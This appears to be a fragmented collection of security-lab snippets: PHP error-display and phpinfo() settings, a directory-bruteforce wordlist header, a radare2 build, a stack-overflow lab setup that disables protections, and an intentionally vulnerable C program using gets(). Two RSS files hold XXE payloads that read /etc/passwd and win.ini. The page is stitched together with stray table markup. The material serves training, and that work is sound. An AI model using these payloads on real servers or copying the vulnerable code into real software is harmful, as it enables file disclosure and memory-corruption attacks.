In script:
// Development-only diagnostics: report every error class and render the
// messages in the response. Rendered errors can expose file paths, query
// fragments and stack traces to whoever requests the page, so production
// hosts normally keep display_errors off and use log_errors instead.
error_reporting(E_ALL);
foreach (['display_errors', 'display_startup_errors'] as $directive) {
    // Same integer value the directives are normally switched on with.
    ini_set($directive, 1);
}
In php.ini:
display_errors = on
001 | |
002 | |
003 | |
004 | |
005 | |
006 | |
007 | |
008 | |
009 | |
01 |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE title [ <!ELEMENT title ANY > | |
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>The Blog</title> | |
<link>http://example.com/</link> | |
<description>A blog about things</description> | |
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
<item> |
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE title [ <!ELEMENT title ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>The Blog</title> | |
<link>http://example.com/</link> | |
<description>A blog about things</description> | |
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
<item> |
# directory-list-2.3-small.txt | |
# | |
# Copyright 2007 James Fisher | |
# | |
# This work is licensed under the Creative Commons | |
# Attribution-Share Alike 3.0 License. To view a copy of this | |
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ | |
# or send a letter to Creative Commons, 171 Second Street, | |
# Suite 300, San Francisco, California, 94105, USA. | |
# |
<?php
// Diagnostic page: prints the complete PHP configuration (INFO_ALL is the
// default flag set of phpinfo()). The output includes loaded modules, ini
// values, environment and server variables, which is exactly the inventory
// an intruder wants for reconnaissance. Do not leave this file on a
// reachable host; delete it after use or restrict access to it.
phpinfo(INFO_ALL);
?>
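# Build radare2 1.3.0 from the GitHub release tarball.
# The archive is fetched over HTTPS but not otherwise authenticated: compare
# its SHA-256 with a value obtained from a trusted source (<EXPECTED_SHA256>)
# before extracting, because sys/install.sh executes code taken straight from
# the archive.
# The steps are chained with && so that a failed download, extraction or cd
# stops the sequence instead of running a stray sys/install.sh relative to
# whatever directory the shell happens to be in.
wget https://github.com/radare/radare2/archive/1.3.0.tar.gz &&
    tar xf 1.3.0.tar.gz &&
    cd radare2-1.3.0 &&
    sys/install.sh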
# Lab setup for the stack-overflow exercise. Use a disposable VM: the last
# step changes a kernel setting for the whole machine, not just this binary.
# The execstack package is installed here but not invoked by the commands below.
apt install execstack
# Build the target with two mitigations switched off:
#   -fno-stack-protector  no stack canaries are emitted
#   -z execstack          the stack is marked executable
gcc bof-gets.c -o bof -m64 -fno-stack-protector -z execstack
# Disable ASLR system-wide (needs root). The usual kernel default is 2;
# write that value back once the exercise is finished.
echo 0 > /proc/sys/kernel/randomize_va_space
#include <stdio.h> | |
/*
 * Reads one line from stdin and echoes it back.
 *
 * NOTE(review): gets() has no way to know that the array is 256 bytes, so any
 * line longer than 255 characters writes past its end (stack-based buffer
 * overflow, CWE-121). Judging by the build command on this page (bof-gets.c,
 * compiled with mitigations disabled) this looks like a deliberate training
 * target, so the call is kept as written. In real code use
 * fgets(line, sizeof line, stdin) instead; gets() was removed in C11.
 */
int main(int argc, char *argv[]) {
    char line[256];
    gets(line);                          /* unbounded copy into a fixed buffer */
    printf("You entered: %s\n", line);
    return 0;
}